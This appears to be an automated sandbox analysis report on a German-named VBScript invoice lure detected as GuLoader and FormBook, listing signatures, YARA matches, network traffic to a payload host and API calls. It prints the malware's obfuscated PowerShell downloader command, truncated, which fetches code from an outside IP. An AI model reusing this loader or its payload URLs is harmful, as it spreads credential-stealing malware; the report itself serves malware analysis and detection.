Windows Analysis Report
Zahlungsbeleg 202405029058.vbs

Overview

General Information

Sample name: Zahlungsbeleg 202405029058.vbs
Analysis ID: 1436288
MD5: 913fa02445aa8092996ad3f000aa1ea1
SHA1: c29022193884baeb4aad8a94884995ea80bdeb25
SHA256: f9a51686ace6a200b6c9de7b9a8cd18c6ab67e6841ba64bf1518932ccd78bf78
Tags: DEUgeovbs
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Yara detected FormBook
Source: Yara match File source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2228792589.00000000082A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, clip.exe
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2226049542.0000000007469000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\clip.exe Code function: 4x nop then mov dword ptr [ebp-000000D8h], 00000000h 20_2_009C9390
Source: C:\Windows\SysWOW64\clip.exe Code function: 4x nop then xor eax, eax 20_2_009C9390
Source: C:\Windows\SysWOW64\clip.exe Code function: 4x nop then mov dword ptr [ebp-000000D8h], 00000000h 20_2_009C9386

Networking
barindex
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping google.com -n 1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /Oxaluria209.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.54Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vKdsOriqv105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.54Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: unknown TCP traffic detected without corresponding DNS query: 87.121.105.54
Source: global traffic HTTP traffic detected: GET /Oxaluria209.smi HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.54Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /vKdsOriqv105.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 87.121.105.54Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: google.com
Source: powershell.exe, 00000007.00000002.2596105612.000001A98C3A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2596105612.000001A98E1B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.54
Source: powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.54/Oxaluria209.smi
Source: powershell.exe, 00000007.00000002.2596105612.000001A98C3A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.54/Oxaluria209.smiP
Source: powershell.exe, 00000007.00000002.2596105612.000001A98E1B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.H
Source: wscript.exe, 00000000.00000003.1737953396.00000271C00C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1737292846.00000271C005F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1738541930.00000271C00C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1739297831.00000271C22D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.1691091574.00000271C22FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?39d9c19692ac2
Source: wscript.exe, 00000000.00000003.1737953396.00000271C00C7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1737292846.00000271C005F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1738541930.00000271C00C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/engKa
Source: wscript.exe, 00000000.00000003.1691862227.00000271C2325000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1691091574.00000271C22FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?39d9c19692
Source: powershell.exe, 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.2596105612.000001A98C181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000007.00000002.2596105612.000001A98C181000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.2141351591.00000000048F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000007.00000002.2596105612.000001A98D62D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2197404574.000000000580B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_7316.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_7560.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000014.00000002.2971248438.0000000000EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2454959206.0000000000C70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.2971966360.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.2970978942.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000016.00000002.2697965276.00000000010E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.2503696155.0000000025250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.2971188176.0000000000E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7316, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7560, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6871
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6871
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6871 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6871 Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba Jump to behavior
Contains functionality to call native functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B735C0 NtCreateMutant,LdrInitializeThunk, 15_2_23B735C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72B60 NtClose,LdrInitializeThunk, 15_2_23B72B60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72DF0 NtQuerySystemInformation,LdrInitializeThunk, 15_2_23B72DF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72C70 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_23B72C70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B74340 NtSetContextThread, 15_2_23B74340
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B73090 NtSetValueKey, 15_2_23B73090
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B73010 NtOpenDirectoryObject, 15_2_23B73010
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B74650 NtSuspendThread, 15_2_23B74650
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72BA0 NtEnumerateValueKey, 15_2_23B72BA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72B80 NtQueryInformationFile, 15_2_23B72B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72BF0 NtAllocateVirtualMemory, 15_2_23B72BF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72BE0 NtQueryValueKey, 15_2_23B72BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72AB0 NtWaitForSingleObject, 15_2_23B72AB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72AF0 NtWriteFile, 15_2_23B72AF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72AD0 NtReadFile, 15_2_23B72AD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B739B0 NtGetContextThread, 15_2_23B739B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72FB0 NtResumeThread, 15_2_23B72FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72FA0 NtQuerySection, 15_2_23B72FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72F90 NtProtectVirtualMemory, 15_2_23B72F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72FE0 NtCreateFile, 15_2_23B72FE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72F30 NtCreateSection, 15_2_23B72F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72F60 NtCreateProcessEx, 15_2_23B72F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72EA0 NtAdjustPrivilegesToken, 15_2_23B72EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72E80 NtReadVirtualMemory, 15_2_23B72E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72EE0 NtQueueApcThread, 15_2_23B72EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72E30 NtWriteVirtualMemory, 15_2_23B72E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72DB0 NtEnumerateKey, 15_2_23B72DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72DD0 NtDelayExecution, 15_2_23B72DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72D30 NtUnmapViewOfSection, 15_2_23B72D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B73D10 NtOpenProcessToken, 15_2_23B73D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72D10 NtMapViewOfSection, 15_2_23B72D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72D00 NtSetInformationFile, 15_2_23B72D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B73D70 NtOpenThread, 15_2_23B73D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72CA0 NtQueryInformationToken, 15_2_23B72CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72CF0 NtOpenProcess, 15_2_23B72CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_23B72CC0 NtQueryVirtualMemory, 15_2_23B72CC0
